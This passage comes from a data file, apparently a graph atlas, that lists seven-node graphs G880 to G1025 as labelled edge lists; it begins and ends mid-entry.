[6, 4],
[5, 4],
[1, 3]]],
['edgelist',
'G880',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[1, 7]]],
['edgelist',
'G881',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[6, 2],
[3, 5]]],
['edgelist',
'G882',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4]]],
['edgelist',
'G883',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4]]],
['edgelist',
'G884',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6],
[7, 2]]],
['edgelist',
'G885',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[5, 7],
[6, 4]]],
['edgelist',
'G886',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[2, 7]]],
['edgelist',
'G887',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[4, 7]]],
['edgelist',
'G888',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[5, 7]]],
['edgelist',
'G889',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[7, 2]]],
['edgelist',
'G890',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[1, 7]]],
['edgelist',
'G891',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[1, 7]]],
['edgelist',
'G892',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[3, 7]]],
['edgelist',
'G893',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[2, 7]]],
['edgelist',
'G894',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[5, 7]]],
['edgelist',
'G895',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[7, 2],
[7, 6]]],
['edgelist',
'G896',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[2, 7]]],
['edgelist',
'G897',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[4, 6],
[1, 4],
[6, 7]]],
['edgelist',
'G898',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[2, 5]]],
['edgelist',
'G899',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[4, 6],
[1, 4],
[4, 7]]],
['edgelist',
'G900',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[5, 7]]],
['edgelist',
'G901',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[3, 7]]],
['edgelist',
'G902',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[1, 5]]],
['edgelist',
'G903',
7,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6],
[4, 7]]],
['edgelist',
'G904',
7,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6],
[1, 7]]],
['edgelist',
'G905',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[6, 7]]],
['edgelist',
'G906',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4],
[6, 7]]],
['edgelist',
'G907',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 7]]],
['edgelist',
'G908',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[1, 7]]],
['edgelist',
'G909',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[5, 6]]],
['edgelist',
'G910',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[4, 7]]],
['edgelist',
'G911',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4],
[1, 7]]],
['edgelist',
'G912',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[6, 7]]],
['edgelist',
'G913',
7,
[[1, 4],
[7, 1],
[6, 7],
[4, 6],
[2, 4],
[7, 2],
[5, 7],
[4, 5],
[3, 4],
[7, 3],
[4, 7],
[6, 5]]],
['edgelist',
'G914',
7,
[[1, 2],
[5, 1],
[6, 5],
[2, 6],
[5, 2],
[3, 5],
[2, 3],
[7, 2],
[5, 7],
[3, 7],
[4, 3],
[5, 4]]],
['edgelist',
'G915',
7,
[[5, 2],
[4, 3],
[4, 1],
[5, 3],
[6, 2],
[6, 1],
[4, 6],
[5, 4],
[6, 5],
[7, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G916',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[5, 3],
[4, 5],
[6, 4],
[1, 6],
[7, 4],
[2, 7]]],
['edgelist',
'G917',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[7, 4],
[1, 7],
[6, 1],
[2, 6],
[5, 2],
[3, 5]]],
['edgelist',
'G918',
7,
[[7, 3],
[6, 7],
[4, 6],
[3, 4],
[2, 3],
[5, 2],
[6, 5],
[3, 6],
[5, 3],
[1, 5],
[2, 1],
[6, 2]]],
['edgelist',
'G919',
7,
[[6, 5],
[7, 6],
[4, 7],
[5, 4],
[1, 5],
[4, 1],
[2, 4],
[1, 2],
[5, 2],
[4, 6],
[3, 4],
[5, 3]]],
['edgelist',
'G920',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[2, 6],
[7, 2],
[1, 7]]],
['edgelist',
'G921',
7,
[[2, 3],
[1, 2],
[3, 1],
[4, 3],
[1, 4],
[2, 4],
[5, 3],
[1, 5],
[6, 5],
[3, 6],
[7, 3],
[2, 7]]],
['edgelist',
'G922',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 3],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G923',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[2, 6],
[7, 2],
[3, 7]]],
['edgelist',
'G924',
7,
[[2, 3],
[1, 2],
[3, 1],
[4, 3],
[1, 4],
[2, 4],
[5, 3],
[1, 5],
[7, 5],
[3, 7],
[6, 3],
[5, 6]]],
['edgelist',
'G925',
7,
[[2, 1],
[3, 2],
[1, 3],
[4, 1],
[5, 4],
[1, 5],
[6, 1],
[4, 6],
[5, 6],
[7, 5],
[4, 7],
[7, 1]]],
['edgelist',
'G926',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[7, 6],
[3, 7]]],
['edgelist',
'G927',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 5],
[1, 7],
[6, 1],
[4, 6]]],
['edgelist',
'G928',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[2, 6],
[7, 2],
[1, 7],
[6, 1],
[5, 6]]],
['edgelist',
'G929',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 2],
[1, 7],
[6, 1],
[3, 6]]],
['edgelist',
'G930',
7,
[[6, 5],
[4, 6],
[5, 4],
[7, 5],
[4, 7],
[3, 4],
[5, 3],
[1, 5],
[4, 1],
[2, 1],
[3, 2],
[7, 3]]],
['edgelist',
'G931',
7,
[[5, 2],
[4, 3],
[4, 1],
[5, 3],
[6, 2],
[6, 1],
[4, 6],
[5, 4],
[6, 5],
[7, 6],
[1, 7],
[4, 7]]],
['edgelist',
'G932',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 2],
[1, 7],
[6, 1],
[2, 6]]],
['edgelist',
'G933',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[4, 2],
[6, 2],
[7, 6],
[5, 7]]],
['edgelist',
'G934',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 5],
[4, 6],
[7, 4],
[5, 7]]],
['edgelist',
'G935',
7,
[[2, 1],
[3, 2],
[4, 3],
[1, 4],
[5, 4],
[2, 5],
[5, 1],
[6, 5],
[1, 6],
[4, 6],
[7, 1],
[2, 7]]],
['edgelist',
'G936',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 3],
[5, 7],
[6, 1],
[2, 6]]],
['edgelist',
'G937',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[6, 5],
[3, 6],
[2, 6],
[7, 2],
[6, 7]]],
['edgelist',
'G938',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[5, 3],
[6, 4],
[7, 2],
[7, 5],
[5, 1],
[4, 5],
[2, 6]]],
['edgelist',
'G939',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 3],
[5, 4],
[5, 2],
[1, 5],
[6, 3],
[6, 5],
[7, 1],
[4, 7]]],
['edgelist',
'G940',
7,
[[6, 1],
[3, 6],
[7, 3],
[4, 7],
[3, 4],
[2, 3],
[1, 2],
[5, 1],
[2, 5],
[6, 2],
[7, 6],
[1, 3]]],
['edgelist',
'G941',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 5],
[3, 7],
[6, 3],
[4, 6]]],
['edgelist',
'G942',
7,
[[1, 3],
[2, 1],
[6, 2],
[4, 6],
[7, 4],
[3, 7],
[5, 3],
[4, 5],
[6, 5],
[3, 6],
[2, 3],
[5, 2]]],
['edgelist',
'G943',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[5, 1],
[2, 5],
[5, 3],
[4, 5],
[6, 5],
[7, 6],
[4, 7]]],
['edgelist',
'G944',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[7, 2],
[3, 7],
[5, 7],
[4, 5],
[6, 4],
[7, 6]]],
['edgelist',
'G945',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[7, 6],
[1, 7],
[4, 5]]],
['edgelist',
'G946',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[3, 6],
[7, 1],
[4, 7]]],
['edgelist',
'G947',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[6, 5],
[7, 4],
[5, 7],
[2, 7],
[7, 6]]],
['edgelist',
'G948',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G949',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 3],
[7, 6],
[1, 7],
[7, 3],
[1, 6],
[2, 6],
[7, 2]]],
['edgelist',
'G950',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5],
[6, 2]]],
['edgelist',
'G951',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G952',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[5, 6],
[7, 5],
[6, 7]]],
['edgelist',
'G953',
7,
[[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 4],
[7, 2]]],
['edgelist',
'G954',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G955',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G956',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[5, 7],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[7, 2],
[3, 7]]],
['edgelist',
'G957',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 4],
[7, 5],
[5, 3],
[1, 4],
[5, 4]]],
['edgelist',
'G958',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[7, 6]]],
['edgelist',
'G959',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[7, 6],
[1, 7],
[2, 7]]],
['edgelist',
'G960',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[5, 2],
[2, 1],
[6, 2],
[6, 3],
[7, 2],
[3, 7],
[5, 7]]],
['edgelist',
'G961',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 7],
[6, 4],
[2, 6],
[7, 3]]],
['edgelist',
'G962',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 6],
[6, 4],
[7, 2],
[5, 7]]],
['edgelist',
'G963',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 6],
[6, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G964',
7,
[[5, 4],
[2, 3],
[1, 2],
[1, 4],
[5, 1],
[7, 5],
[5, 3],
[6, 5],
[7, 3],
[7, 4],
[4, 3],
[6, 2]]],
['edgelist',
'G965',
7,
[[3, 4],
[5, 3],
[1, 5],
[7, 1],
[7, 6],
[5, 6],
[2, 4],
[6, 2],
[1, 6],
[7, 2],
[4, 7],
[6, 4]]],
['edgelist',
'G966',
7,
[[1, 4],
[1, 6],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G967',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G968',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[5, 4],
[6, 4],
[7, 2],
[4, 7],
[7, 3],
[1, 7],
[5, 7]]],
['edgelist',
'G969',
7,
[[1, 2],
[3, 5],
[1, 3],
[7, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[5, 7]]],
['edgelist',
'G970',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 4],
[2, 7]]],
['edgelist',
'G971',
7,
[[5, 4],
[2, 3],
[6, 1],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[6, 2],
[7, 3],
[7, 4],
[4, 3],
[7, 5]]],
['edgelist',
'G972',
7,
[[3, 4],
[5, 3],
[6, 5],
[1, 6],
[7, 1],
[2, 7],
[4, 2],
[7, 4],
[6, 4],
[2, 6],
[5, 1],
[4, 1]]],
['edgelist',
'G973',
7,
[[1, 4],
[1, 6],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G974',
7,
[[4, 3],
[2, 3],
[6, 1],
[1, 4],
[5, 1],
[5, 2],
[7, 5],
[6, 2],
[7, 3],
[7, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G975',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G976',
7,
[[1, 4],
[1, 6],
[2, 3],
[2, 5],
[2, 7],
[3, 5],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G977',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G978',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G979',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[4, 5],
[6, 4],
[3, 7],
[7, 2]]],
['edgelist',
'G980',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[4, 5],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G981',
7,
[[1, 3],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G982',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G983',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 2],
[3, 5],
[6, 3],
[1, 6],
[5, 4],
[7, 6],
[7, 5],
[4, 6]]],
['edgelist',
'G984',
7,
[[1, 3],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G985',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G986',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G987',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[6, 7]]],
['edgelist',
'G988',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G989',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[6, 4],
[5, 6],
[7, 5]]],
['edgelist',
'G990',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G991',
7,
[[1, 2],
[1, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G992',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[6, 4],
[7, 5],
[2, 4]]],
['edgelist',
'G993',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G994',
7,
[[3, 4],
[5, 3],
[6, 3],
[5, 2],
[7, 1],
[4, 1],
[4, 2],
[7, 4],
[6, 7],
[2, 6],
[5, 1],
[4, 5]]],
['edgelist',
'G995',
7,
[[3, 4],
[5, 3],
[5, 2],
[3, 6],
[7, 1],
[7, 5],
[4, 2],
[7, 4],
[1, 4],
[2, 6],
[5, 1],
[6, 4]]],
['edgelist',
'G996',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G997',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[2, 4],
[7, 5],
[6, 5]]],
['edgelist',
'G998',
7,
[[7, 4],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[1, 7],
[5, 2],
[4, 5],
[7, 6],
[6, 2],
[1, 5]]],
['edgelist',
'G999',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G1000',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1001',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1002',
7,
[[1, 5],
[4, 1],
[2, 4],
[5, 2],
[2, 1],
[5, 6],
[3, 5],
[7, 3],
[6, 7],
[3, 6],
[4, 3],
[7, 4]]],
['edgelist',
'G1003',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[6, 3],
[6, 5],
[7, 5],
[7, 4],
[7, 3],
[6, 4]]],
['edgelist',
'G1004',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7]]],
['edgelist',
'G1005',
7,
[[4, 1],
[5, 3],
[4, 2],
[5, 1],
[6, 3],
[6, 2],
[5, 4],
[6, 5],
[4, 6],
[7, 2],
[1, 7],
[3, 7]]],
['edgelist',
'G1006',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[7, 6],
[2, 7],
[4, 5],
[6, 4],
[3, 4],
[6, 3],
[7, 4],
[3, 7]]],
['edgelist',
'G1007',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4]]],
['edgelist',
'G1008',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5],
[7, 6]]],
['edgelist',
'G1009',
7,
[[4, 7],
[2, 3],
[1, 7],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[3, 6],
[5, 6],
[7, 5]]],
['edgelist',
'G1010',
7,
[[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1011',
7,
[[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1012',
7,
[[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1013',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4],
[1, 3],
[7, 5]]],
['edgelist',
'G1014',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5],
[2, 7]]],
['edgelist',
'G1015',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1016',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1017',
7,
[[1, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1018',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1019',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1020',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1021',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 6],
[2, 7]]],
['edgelist',
'G1022',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4],
[1, 3],
[6, 7]]],
['edgelist',
'G1023',
7,
[[1, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1024',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1025',
7,
[[6, 7],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
